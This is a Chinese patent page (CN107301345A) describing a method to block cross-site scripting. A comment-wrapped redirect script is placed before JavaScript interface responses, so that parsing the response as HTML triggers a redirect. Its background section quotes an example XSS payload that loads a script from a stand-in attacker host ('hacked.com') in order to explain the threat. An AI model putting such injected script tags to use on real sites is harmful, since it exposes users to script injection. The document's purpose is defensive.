CN107301345A - 一种阻止xss攻击的方法、系统及装置 - Google Patents
一种阻止xss攻击的方法、系统及装置 Download PDFInfo
- Publication number
- CN107301345A CN107301345A CN201710416624.5A CN201710416624A CN107301345A CN 107301345 A CN107301345 A CN 107301345A CN 201710416624 A CN201710416624 A CN 201710416624A CN 107301345 A CN107301345 A CN 107301345A
- Authority
- CN
- China
- Prior art keywords
- page data
- attack
- attack protection
- browser
- javascript
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Granted
Links
Classifications
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F21/00—Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
- G06F21/50—Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
- G06F21/52—Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems during program execution, e.g. stack integrity ; Preventing unwanted data erasure; Buffer overflow
- G06F21/54—Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems during program execution, e.g. stack integrity ; Preventing unwanted data erasure; Buffer overflow by adding security routines or objects to programs
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1441—Countermeasures against malicious traffic
- H04L63/1466—Active attacks involving interception, injection, modification, spoofing of data unit addresses, e.g. hijacking, packet injection or TCP sequence number attacks
Landscapes
- Engineering & Computer Science (AREA)
- Computer Security & Cryptography (AREA)
- Software Systems (AREA)
- Computer Hardware Design (AREA)
- General Engineering & Computer Science (AREA)
- Theoretical Computer Science (AREA)
- Computing Systems (AREA)
- Computer Networks & Wireless Communication (AREA)
- Signal Processing (AREA)
- Physics & Mathematics (AREA)
- General Physics & Mathematics (AREA)
- Computer And Data Communications (AREA)
Abstract
本发明实施例提供一种阻止XSS攻击的方法、系统及装置,该方法包括:监控用户访问页面时网站服务器通过指定接口返回的页面数据,所述页面数据中包含防攻击注释标签;当浏览器将页面数据作为指定接口数据进行解析时,将所述防攻击注释标签解析为注释信息,并继续正常解析页面数据的后续内容;当浏览器将页面数据作为HTML进行解析时,认为存在XSS攻击,执行所述防攻击注释标签实现网页跳转。能够有效的防止XSS攻击,在有可能存在XSS攻击时,及时跳转,避免用户受到有害攻击。
Description
技术领域
本发明涉及网络安全技术领域,尤指一种阻止跨域脚本攻击(cross-sitescripting,XSS)的方法、系统及装置。
背景技术
随着网络技术的发展,越来越多的用户使用浏览器浏览网站发布的网页,而在用户浏览网页内容时,网站通常需要使用JavaScript(JS)接口返回数据供用户浏览器进行渲染,以便浏览器将数据展示给用户。
在这个过程中,如果数据返回的结果不当,可能造成用户被XSS攻击。通常情况下,攻击者试图让用户将这些JS接口当做页面解析,而JS和超文本标记语言(HyperTextMarkup Language,HTML)的语法不同,给了攻击者可乘之机。
为了防止XSS攻击,挺高网络安全性,目前常用的做法包括以下两种:
一是对返回的超文本传输协议(HyperText Transfer Protocol,HTTP)头中的内容类型(Content-type)进行修改,使浏览器拒绝将此统一资源定位符(UniversalResource Locator,URL)作为页面打开和渲染。
二是对返回的内容进行转义,防止特殊的字符出现。
上述的两种方法都是被广泛使用的,但是却存在缺点:如果使用第一种方式,部分老旧的浏览器无法正确处理Content-type,又或者是,可以使用某些攻击手段,使用户将上述JS接口当作页面进行渲染,从而不能有效的防止XSS攻击。尤其是旧版浏览器中这种确定表现的比较明显。
如果使用第二种方式,对于用户传入的内容进行转义是可行的,但是却可能影响一些既有的用法和功能;另一方面,对于本身输出的内容,由于JS和HTML的语法区别,可能本身存储了足以触发XSS的字符。例如,攻击者可以通过某些方法,典型的如留言板,使用户访问到一个如下的接口:callback({“content”:“<script src=http://hacked.com/hacked.js></script>”});从而可以继续实施攻击,因此,这种方式也不能有效的防止XSS攻击。
可见,现有技术中的用于防止XSS攻击的方式都存在其弊端,都不能十分有效地防止XSS攻击,网络安全不能得到有效保障,安全性差。
发明内容
本发明实施例提供一种阻止XSS攻击的方法、系统及装置,用以解决现有技术中存在的不能有效阻止XSS攻击、JS接口使用过程中安全性差、网络安全不能得到保障的问题。
一方面,本发明实施例提供了一种阻止XSS攻击的方法,包括:
监控用户访问页面时网站服务器通过指定接口返回的页面数据,所述页面数据中包含防攻击注释标签;
当浏览器将页面数据作为指定接口数据进行解析时,将所述防攻击注释标签解析为注释信息,并继续正常解析页面数据的后续内容;
当浏览器将页面数据作为超文本标记语言HTML进行解析时,执行所述防攻击注释标签实现网页跳转。
在一些可选的实施例中,所述防攻击注释标签添加在通过指定接口返回的页面数据正文的前边。
在一些可选的实施例中,所述防攻击注释标签中的防攻击标签用于实现页面跳转,所述防攻击注释标签中的注释包围所述防攻击标签。
在一些可选的实施例中,所述指定接口为JavaScript接口,所述防攻击注释标签为JavaScript注释标签。
本发明实施例还提供一种阻止跨域脚本XSS攻击的装置,包括:
监控接收模块,用于监控用户访问页面时网站服务器通过指定接口返回的页面数据,所述页面数据中包含防攻击注释标签;
解析执行模块,用于当浏览器将页面数据作为指定接口数据进行解析时,将所述防攻击注释标签解析为注释信息,并继续正常解析页面数据的后续内容;当浏览器将页面数据作为超文本标记语言HTML进行解析时,执行防攻击注释标签实现网页跳转。
在一些可选的实施例中,所述监控接收模块,具体用于:
接收到的所述页面数据中包含的防攻击注释标签添加在通过指定接口返回的页面数据正文的前边。
在一些可选的实施例中,所述监控接收模块,具体用于:
接收到的所述页面数据包含的防攻击注释标签中的防攻击标签用于实现页面跳转,所述防攻击注释标签中的注释包围所述防攻击标签。
在一些可选的实施例中,所述监控接收模块,具体用于:监控用户访问页面时网站服务器通过JavaScript接口返回的页面数据,所述页面数据中包含JavaScript注释标签;
相应的,解析执行模块,具体用于当浏览器将页面数据作为JavaScript数据进行解析时,将所述JavaScript注释标签解析为注释信息,并继续正常解析页面数据的后续内容;
当浏览器将页面数据作为超文本标记语言HTML进行解析时,认为存在XSS攻击,执行JavaScript注释标签实现网页跳转。
本发明实施例还提供一种阻止跨域脚本XSS攻击的系统,包括:浏览器和网站服务器;
所述浏览器中包括上述的阻止XSS攻击的装置;
所述网站服务器,用于当用户访问网页时,向浏览器返回包含防攻击注释标签的页面数据。
在一些可选的实施例中,所述网站服务器,具体用于:
将所述防攻击注释标签添加在返回的页面数据正文的前边;所述防攻击注释标签中的防攻击标签用于实现页面跳转,所述防攻击注释标签中的注释包围所述防攻击标签。
上述技术方案具有如下有益效果:
用户访问页面时,在网站服务器通过JavaScript接口返回的数据中加入JavaScript注释标签,当浏览器将页面作为JavaScript解析时,将JavaScript注释标签解析为注释信息,并继续正常解析网页的后续内容;当浏览器将页面作为HTML解析时,执行JavaScript注释标签实现网页跳转,从而可以从攻击内容中跳转出来,用户不会执行攻击内容,使攻击代码无法执行,用户不会受到攻击,该方法通过跳转的方式是攻击者的内容无法被执行,从而有效地避免攻击。
附图说明
为了更清楚地说明本发明实施例或现有技术中的技术方案,下面将对实施例或现有技术描述中所需要使用的附图作简单地介绍,显而易见地,下面描述中的附图仅仅是本发明的一些实施例,对于本领域普通技术人员来讲,在不付出创造性劳动的前提下,还可以根据这些附图获得其他的附图。
图1是本发明实施例一中阻止XSS攻击的方法流程图;
图2是本发明实施例二中阻止XSS攻击的方法流程图;
图3是本发明实施例中阻止XSS攻击的系统结构示意图;
图4是本发明实施例中阻止XSS攻击的装置结构示意图。
具体实施方式
下面将结合本发明实施例中的附图,对本发明实施例中的技术方案进行清楚、完整地描述,显然,所描述的实施例仅仅是本发明一部分实施例,而不是全部的实施例。基于本发明中的实施例,本领域普通技术人员在没有做出创造性劳动前提下所获得的所有其他实施例,都属于本发明保护的范围。
跨域脚本(Cross-site scripting,XSS)攻击是最常见的网页(Web)攻击,其重点是“跨域”和“客户端执行”,XSS攻击有时候可以被分为三种,分别是:基于反射的XSS攻击(Reflected XSS)、基于存储的XSS攻击(Stored XSS)、基于DOM或本地的XSS攻击(DOM-based or local XSS)等。
为了解决现有技术中存在的不能十分有效地防止XSS攻击,网络安全不能得到有效保障的问题,本发明实施例提供一种阻止XSS攻击的方法,能够有效的防止XSS攻击,提高网络访问安全性,保障用户在网络使用过程中的信息安全,尤其针对JS脚本实现有效的XSS攻击阻止。
实施例一
本发明实施例一提供的阻止XSS攻击的方法,其流程如图1所示,包括如下步骤:
步骤S101:监控用户访问页面时网站服务器通过指定接口返回的页面数据。其中,页面数据中包含防攻击注释标签。
浏览器向网站服务器发送用户的页面访问请求,网站服务器通过指定接口向浏览器返回页面数据,浏览器监控接收网站服务器通过指定接口返回的页面数据。
网站服务器在返回页面数据时,将防攻击注释标签添加在通过指定接口返回的页面数据正文的前边。其中,防攻击注释标签中的防攻击标签用于实现页面跳转,防攻击注释标签中的注释包围防攻击标签。
浏览器通过指定接口接收网站服务器返回的包含防攻击注释标签的页面数据。
优选的,指定接口为JavaScript接口,防攻击注释标签为JavaScript注释标签。
步骤S102:当浏览器将页面数据作为指定接口数据进行解析时,将包含的防攻击注释标签解析为注释信息,并继续正常解析页面数据的后续内容。
浏览器对接收到的页面数据进行解析,当作为指定接口数据,例如JavaScript接口数据进行解析时,认为不存在攻击,将防攻击注释标签作为注释进行解析,然后正常解析页面数据的后续内容,从而实现页面数据的正常解析使用。
步骤S103:当浏览器将页面数据作为HTML进行解析时,执行包含的防攻击注释标签实现网页跳转。
浏览器将页面数据作为HTML进行解析时,认为可能存在XSS攻击,为了防止用户被攻击,执行页面数据中包含的防攻击注释标签,使网页进行跳转,不会进入攻击者所希望用户访问的页面,从而避免攻击对用户造成的危害。
优选的,上述方法可以通过用户代理(user-agent)判断用户浏览器版本,当用户使用旧版浏览器时,并且请求的接口符合要求(比如是JS输出)时使用上述方法进行攻击阻止。
实施例二
本发明实施例二提供的阻止XSS攻击的方法,其流程如图2所示,包括如下步骤:
步骤S201:浏览器向网站服务器发送用户的页面访问请求。
步骤S202:网站服务器通过JavaScript接口向浏览器返回页面数据。
网站服务器返回的页面数据中包含JavaScript注释标签。即网站服务器在返回的页面数据正文前加入足以使页面跳走的JS标签,并使用JS的注释将其包围。例如在返回的内容正文前加入:
/*<script>location.href=“http://sina.com.cn”;</script>*/
步骤S203:浏览器接收网站服务器通过JavaScript接口返回的页面数据。
浏览器监控用户访问页面时网站服务器通过JavaScript接口返回的页面数据。
步骤S204:浏览器将页面数据作为JavaScript数据进行解析。
浏览器将页面数据作为JavaScript数据解析时,即用户正常访问页面,不存在XSS攻击。
步骤S205:将页面数据中包含的JavaScript注释标签解析为注释信息,并继续正常解析页面数据的后续内容。
当浏览器正常解析页面数据时,将页面数据中包含的JavaScript注释标签解析为注释信息,并继续正常解析页面数据的后续内容;即JavaScript注释标签作为注释不被执行,并正常解析后续的页面内容。
步骤S206:浏览器将页面数据作为HTML数据进行解析。
浏览器将页面数据作为HTML数据解析时,属于非正常解析页面。
步骤S207:认为页面数据中可能存在XSS攻击。
步骤S208:执行JavaScript注释标签进行网页跳转。
当浏览器将页面数据作为超文本标记语言HTML数据进行解析时,认为存在XSS攻击,执行JavaScript注释标签实现网页跳转。
也就是说,当用户被攻击时,攻击者希望浏览器将页面视为html解析时,先执行上述script块,即JavaScript注释标签,用户跳走;攻击者注入的攻击代码无法被执行,用户无法受到攻击。
本发明方法基于XSS攻击利用的原理进行防攻击处理,即XSS攻击者希望将一个非HTML页面数据,比如JS页面数据,让受害者以HTML解析;而本发明正是利用这一点,一旦该网页内容被以HTML解析,则触发跳转,攻击者无法让受害者执行其希望的内容。
基于同一发明构思,本发明实施例还提供一种阻止XSS攻击的系统,其结构如图3所示,包括:浏览器301和网站服务器302。
浏览器301中包括阻止XSS攻击的装置,用于监控用户访问页面时网站服务器通过指定接口返回的页面数据,其中,页面数据中包含防攻击注释标签;当浏览器将页面数据作为指定接口数据进行解析时,将防攻击注释标签解析为注释信息,并继续正常解析页面数据的后续内容;当浏览器将页面数据作为HTML进行解析时,执行防攻击注释标签实现网页跳转。
上述阻止攻击实现过程由浏览器自动执行。
网站服务器302,用于当用户访问网页时,向浏览器301返回包含防攻击注释标签的页面数据。
优选的,上述浏览器301,具体用于接收到的页面数据中包含的防攻击注释标签添加在通过指定接口返回的页面数据正文的前边。
优选的,上述浏览器301,具体用于接收到的页面数据包含的防攻击注释标签中的防攻击标签用于实现页面跳转,防攻击注释标签中的注释包围防攻击标签。
优选的,上述浏览器301,具体用于监控用户访问页面时网站服务器通过JavaScript接口返回的页面数据,其中,页面数据中包含JavaScript注释标签;当浏览器将页面数据作为JavaScript数据进行解析时,将JavaScript注释标签解析为注释信息,并继续正常解析页面数据的后续内容;当浏览器将页面数据作为超文本标记语言HTML进行解析时,执行JavaScript注释标签实现网页跳转。
优选的,网站服务器302,具体用于将防攻击注释标签添加在返回的页面数据正文的前边;其中,防攻击注释标签中的防攻击标签用于实现页面跳转,防攻击注释标签中的注释包围防攻击标签。
上述阻止XSS攻击的装置,其结构如图4所示,包括:监控接收模块401和解析执行模块402。
监控接收模块401,用于监控用户访问页面时网站服务器通过指定接口返回的页面数据,其中,页面数据中包含防攻击注释标签。
解析执行模块402,用于当浏览器将页面数据作为指定接口数据进行解析时,将包含的防攻击注释标签解析为注释信息,并继续正常解析页面数据的后续内容;当浏览器将页面数据作为HTML进行解析时,执行防攻击注释标签实现网页跳转。
优选的,上述监控接收模块401,具体用于接收到的页面数据中包含的防攻击注释标签添加在指定接口返回的页面数据正文的前边。
优选的,上述监控接收模块401,具体用于接收到的页面数据包含的防攻击注释标签中的防攻击标签用于实现页面跳转,防攻击注释标签中的注释包围防攻击标签。
优选的,上述监控接收模块401,具体用于监控用户访问页面时网站服务器通过JavaScript接口返回的页面数据,其中,页面数据中包含JavaScript注释标签;
相应的,解析执行模块402,具体用于当浏览器将页面数据作为JavaScript数据进行解析时,将JavaScript注释标签解析为注释信息,并继续正常解析页面数据的后续内容;当浏览器将页面数据作为超文本标记语言HTML进行解析时,行JavaScript注释标签实现网页跳转。
本发明的上述方法和装置,适用范围广泛,对于老旧的浏览器也能提供防攻击保护,不用转义任何内容,可以很好的兼容既有用法,在调用关系复杂时特别有用。实现简单方便、防攻击更有效,网页安全得到更有力的保障。
本领域技术人员还可以了解到本发明实施例列出的各种说明性逻辑块(illustrative logical block),单元,和步骤可以通过电子硬件、电脑软件,或两者的结合进行实现。为清楚展示硬件和软件的可替换性(interchangeability),上述的各种说明性部件(illustrative components),单元和步骤已经通用地描述了它们的功能。这样的功能是通过硬件还是软件来实现取决于特定的应用和整个系统的设计要求。本领域技术人员可以对于每种特定的应用,可以使用各种方法实现所述的功能,但这种实现不应被理解为超出本发明实施例保护的范围。
本发明实施例中所描述的各种说明性的逻辑块,或单元都可以通过通用处理器,数字信号处理器,专用集成电路(ASIC),现场可编程门阵列或其它可编程逻辑装置,离散门或晶体管逻辑,离散硬件部件,或上述任何组合的设计来实现或操作所描述的功能。通用处理器可以为微处理器,可选地,该通用处理器也可以为任何传统的处理器、控制器、微控制器或状态机。处理器也可以通过计算装置的组合来实现,例如数字信号处理器和微处理器,多个微处理器,一个或多个微处理器联合一个数字信号处理器核,或任何其它类似的配置来实现。
本发明实施例中所描述的方法或算法的步骤可以直接嵌入硬件、处理器执行的软件模块、或者这两者的结合。软件模块可以存储于RAM存储器、闪存、ROM存储器、EPROM存储器、EEPROM存储器、寄存器、硬盘、可移动磁盘、CD-ROM或本领域中其它任意形式的存储媒介中。示例性地,存储媒介可以与处理器连接,以使得处理器可以从存储媒介中读取信息,并可以向存储媒介存写信息。可选地,存储媒介还可以集成到处理器中。处理器和存储媒介可以设置于ASIC中,ASIC可以设置于用户终端中。可选地,处理器和存储媒介也可以设置于用户终端中的不同的部件中。
在一个或多个示例性的设计中,本发明实施例所描述的上述功能可以在硬件、软件、固件或这三者的任意组合来实现。如果在软件中实现,这些功能可以存储与电脑可读的媒介上,或以一个或多个指令或代码形式传输于电脑可读的媒介上。电脑可读媒介包括电脑存储媒介和便于使得让电脑程序从一个地方转移到其它地方的通信媒介。存储媒介可以是任何通用或特殊电脑可以接入访问的可用媒体。例如,这样的电脑可读媒体可以包括但不限于RAM、ROM、EEPROM、CD-ROM或其它光盘存储、磁盘存储或其它磁性存储装置,或其它任何可以用于承载或存储以指令或数据结构和其它可被通用或特殊电脑、或通用或特殊处理器读取形式的程序代码的媒介。此外,任何连接都可以被适当地定义为电脑可读媒介,例如,如果软件是从一个网站站点、服务器或其它远程资源通过一个同轴电缆、光纤电缆、双绞线、数字用户线(DSL)或以例如红外、无线和微波等无线方式传输的也被包含在所定义的电脑可读媒介中。所述的碟片(disk)和磁盘(disc)包括压缩磁盘、镭射盘、光盘、DVD、软盘和蓝光光盘,磁盘通常以磁性复制数据,而碟片通常以激光进行光学复制数据。上述的组合也可以包含在电脑可读媒介中。
以上所述的具体实施方式,对本发明的目的、技术方案和有益效果进行了进一步详细说明,所应理解的是,以上所述仅为本发明的具体实施方式而已,并不用于限定本发明的保护范围,凡在本发明的精神和原则之内,所做的任何修改、等同替换、改进等,均应包含在本发明的保护范围之内。
Claims (10)
1.一种阻止跨域脚本XSS攻击的方法,其特征在于,包括:
监控用户访问页面时网站服务器通过指定接口返回的页面数据,所述页面数据中包含防攻击注释标签;
当浏览器将页面数据作为指定接口数据进行解析时,将所述防攻击注释标签解析为注释信息,并继续正常解析页面数据的后续内容;
当浏览器将页面数据作为超文本标记语言HTML进行解析时,执行所述防攻击注释标签实现网页跳转。
2.如权利要求1所述的方法,其特征在于,所述防攻击注释标签添加在通过指定接口返回的页面数据正文的前边。
3.如权利要求1所述的方法,其特征在于,所述防攻击注释标签中的防攻击标签用于实现页面跳转,所述防攻击注释标签中的注释包围所述防攻击标签。
4.如权利要求1-3任一所述的方法,其特征在于,所述指定接口为JavaScript接口,所述防攻击注释标签为JavaScript注释标签;
相应的,当浏览器将页面数据作为JavaScript数据进行解析时,将所述JavaScript注释标签解析为JavaScript注释信息,并继续正常解析页面数据的后续内容;
当浏览器将页面数据作为HTML进行解析时,认为存在XSS攻击,执行JavaScript注释标签实现网页跳转。
5.一种阻止跨域脚本XSS攻击的装置,其特征在于,包括:
监控接收模块,用于监控用户访问页面时网站服务器通过指定接口返回的页面数据,所述页面数据中包含防攻击注释标签;
解析执行模块,用于当浏览器将页面数据作为指定接口数据进行解析时,将所述防攻击注释标签解析为注释信息,并继续正常解析页面数据的后续内容;当浏览器将页面数据作为超文本标记语言HTML进行解析时,执行防攻击注释标签实现网页跳转。
6.如权利要求5所述的装置,其特征在于,所述监控接收模块,具体用于:
接收到的所述页面数据中包含的防攻击注释标签添加在通过指定接口返回的页面数据正文的前边。
7.如权利要求5所述的装置,其特征在于,所述监控接收模块,具体用于:
接收到的所述页面数据包含的防攻击注释标签中的防攻击标签用于实现页面跳转,所述防攻击注释标签中的注释包围所述防攻击标签。
8.如权利要求5-7任一所述的装置,其特征在于,所述监控接收模块,具体用于:监控用户访问页面时网站服务器通过JavaScript接口返回的页面数据,所述页面数据中包含JavaScript注释标签;
相应的,解析执行模块,具体用于当浏览器将页面数据作为JavaScript数据进行解析时,将所述JavaScript注释标签解析为JavaScript注释信息,并继续正常解析页面数据的后续内容;
当浏览器将页面数据作为超文本标记语言HTML进行解析时,认为存在XSS攻击,执行JavaScript注释标签实现网页跳转。
9.一种阻止跨域脚本XSS攻击的系统,其特征在于,包括:浏览器和网站服务器;
所述浏览器中包括如权利要求5-8任一所述的阻止XSS攻击的装置;
所述网站服务器,用于当用户访问网页时,通过指定接口向浏览器返回包含防攻击注释标签的页面数据。
10.如权利要求9所述的系统,其特征在于,所述网站服务器,具体用于:
将所述防攻击注释标签添加在返回的页面数据正文的前边;所述防攻击注释标签中的防攻击标签用于实现页面跳转,所述防攻击注释标签中的注释包围所述防攻击标签。
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN201710416624.5A CN107301345B (zh) | 2017-06-06 | 2017-06-06 | 一种阻止xss攻击的方法、系统及装置 |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN201710416624.5A CN107301345B (zh) | 2017-06-06 | 2017-06-06 | 一种阻止xss攻击的方法、系统及装置 |
Publications (2)
| Publication Number | Publication Date |
|---|---|
| CN107301345A true CN107301345A (zh) | 2017-10-27 |
| CN107301345B CN107301345B (zh) | 2019-12-06 |
Family
ID=60134690
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN201710416624.5A Active CN107301345B (zh) | 2017-06-06 | 2017-06-06 | 一种阻止xss攻击的方法、系统及装置 |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN107301345B (zh) |
Cited By (3)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN108769081A (zh) * | 2018-07-11 | 2018-11-06 | 中国人民解放军国防科技大学 | 一种检测xss攻击的方法、装置及计算机可读存储介质 |
| US10366655B1 (en) | 2017-08-23 | 2019-07-30 | Shenzhen China Star Optoelectronics Semiconductor Display Technology Co., Ltd. | Pixel driver circuit and driving method thereof |
| CN115221529A (zh) * | 2022-09-14 | 2022-10-21 | 杭州天谷信息科技有限公司 | 一种前端网页的异常注入方法以及系统 |
Citations (5)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| US20130185350A1 (en) * | 2012-01-12 | 2013-07-18 | International Business Machines Corporation | Instructing web clients to ignore scripts in specified portions of web pages |
| WO2015142697A1 (en) * | 2014-03-15 | 2015-09-24 | Belva Kenneth F | Methods for determining cross-site scripting and related vulnerabilities in applications |
| CN105282096A (zh) * | 2014-06-18 | 2016-01-27 | 腾讯科技(深圳)有限公司 | Xss 漏洞检测方法和装置 |
| CN105512559A (zh) * | 2014-10-17 | 2016-04-20 | 阿里巴巴集团控股有限公司 | 一种用于提供访问页面的方法与设备 |
| CN106357668A (zh) * | 2016-10-14 | 2017-01-25 | 福建亿榕信息技术有限公司 | 预防xss攻击的方法 |
-
2017
- 2017-06-06 CN CN201710416624.5A patent/CN107301345B/zh active Active
Patent Citations (5)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| US20130185350A1 (en) * | 2012-01-12 | 2013-07-18 | International Business Machines Corporation | Instructing web clients to ignore scripts in specified portions of web pages |
| WO2015142697A1 (en) * | 2014-03-15 | 2015-09-24 | Belva Kenneth F | Methods for determining cross-site scripting and related vulnerabilities in applications |
| CN105282096A (zh) * | 2014-06-18 | 2016-01-27 | 腾讯科技(深圳)有限公司 | Xss 漏洞检测方法和装置 |
| CN105512559A (zh) * | 2014-10-17 | 2016-04-20 | 阿里巴巴集团控股有限公司 | 一种用于提供访问页面的方法与设备 |
| CN106357668A (zh) * | 2016-10-14 | 2017-01-25 | 福建亿榕信息技术有限公司 | 预防xss攻击的方法 |
Cited By (3)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| US10366655B1 (en) | 2017-08-23 | 2019-07-30 | Shenzhen China Star Optoelectronics Semiconductor Display Technology Co., Ltd. | Pixel driver circuit and driving method thereof |
| CN108769081A (zh) * | 2018-07-11 | 2018-11-06 | 中国人民解放军国防科技大学 | 一种检测xss攻击的方法、装置及计算机可读存储介质 |
| CN115221529A (zh) * | 2022-09-14 | 2022-10-21 | 杭州天谷信息科技有限公司 | 一种前端网页的异常注入方法以及系统 |
Also Published As
| Publication number | Publication date |
|---|---|
| CN107301345B (zh) | 2019-12-06 |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| US10841335B1 (en) | Detecting malicious code received from malicious client side injection vectors | |
| US8898738B2 (en) | Apparatus, system and method for accessing internet webpage | |
| KR101757697B1 (ko) | 실행 가능 텍스트를 갖는 문서의 표시 장치 및 방법 | |
| EP2558973B1 (en) | Streaming insertion of tokens into content to protect against csrf | |
| US20200356661A1 (en) | Detecting malicious code received from malicious client side injection vectors | |
| US9813429B2 (en) | Method for secure web browsing | |
| US10614213B1 (en) | Detecting malicious code existing in internet advertisements by ongoing sandbox monitoring | |
| Tang et al. | Fortifying web-based applications automatically | |
| US9009821B2 (en) | Injection attack mitigation using context sensitive encoding of injected input | |
| US8413236B1 (en) | Clickjacking protection | |
| CN106161617A (zh) | 基于nodejs的反向代理方法、反向代理服务器及系统 | |
| CN104468546B (zh) | 一种网络信息处理方法及防火墙装置、系统 | |
| US8931084B1 (en) | Methods and systems for scripting defense | |
| CN107301345A (zh) | 一种阻止xss攻击的方法、系统及装置 | |
| US10642980B1 (en) | Detecting cross-origin malicious code existing in internet advertisements | |
| US10972507B2 (en) | Content policy based notification of application users about malicious browser plugins | |
| JP2014534498A (ja) | JavaScriptを保護する装置、方法及びコンピューター可読性記憶媒体 | |
| EP3518135B1 (en) | Protection against third party javascript vulnerabilities | |
| CN103648049B (zh) | 一种实现安全播放视频的方法和装置 | |
| Zhou et al. | Protecting private web content from embedded scripts | |
| CN114357457A (zh) | 漏洞检测方法、装置、电子设备和存储介质 | |
| US11128639B2 (en) | Dynamic injection or modification of headers to provide intelligence | |
| CN112287349A (zh) | 安全漏洞检测方法及服务端 | |
| CN105072109A (zh) | 防止跨站脚本攻击的方法及系统 | |
| CN103457942B (zh) | 一种对系统文件进行处理的方法及装置 |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| PB01 | Publication | ||
| PB01 | Publication | ||
| SE01 | Entry into force of request for substantive examination | ||
| SE01 | Entry into force of request for substantive examination | ||
| GR01 | Patent grant | ||
| GR01 | Patent grant | ||
| EE01 | Entry into force of recordation of patent licensing contract | ||
| EE01 | Entry into force of recordation of patent licensing contract |
Application publication date: 20171027 Assignee: XINGCHAO SHANYAO MOBILE NETWORK TECHNOLOGY (CHINA) Co.,Ltd. Assignor: SINA.COM TECHNOLOGY (CHINA) Co.,Ltd. Contract record no.: X2021980003903 Denomination of invention: A method, system and device for preventing XSS attack Granted publication date: 20191206 License type: Common License Record date: 20210524 |
|
| TR01 | Transfer of patent right | ||
| TR01 | Transfer of patent right |
Effective date of registration: 20230427 Address after: Room 501-502, 5/F, Sina Headquarters Scientific Research Building, Block N-1 and N-2, Zhongguancun Software Park, Dongbei Wangxi Road, Haidian District, Beijing, 100193 Patentee after: Sina Technology (China) Co.,Ltd. Address before: 100193 7th floor, scientific research building, Sina headquarters, plot n-1, n-2, Zhongguancun Software Park, Dongbei Wangxi Road, Haidian District, Beijing, 100193 Patentee before: Sina.com Technology (China) Co.,Ltd. |